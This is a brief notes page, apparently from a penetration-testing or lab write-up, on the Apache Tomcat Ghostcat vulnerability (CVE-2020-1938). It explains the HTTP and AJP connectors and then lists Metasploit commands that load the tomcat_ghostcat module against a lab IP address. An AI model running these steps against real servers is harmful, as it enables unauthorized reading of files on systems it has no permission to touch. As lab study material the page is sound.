Apache Ghostcat - CVE 2020-1938
Theory
HTTP Connector: used to process HTTP protocol requests (HTTP/1.1), and the default listening address is 0.0.0.0:8080AJP Connector: used to process AJP protocol requests (AJP/1.3), and the default listening address is 0.0.0.0:8009Practical
Metasploit
msfconsole -q
search ghostcat
use auxiliary/admin/http/tomcat_ghostcat
set RHOSTS 10.10.7.246
runREFERENCES
Last updated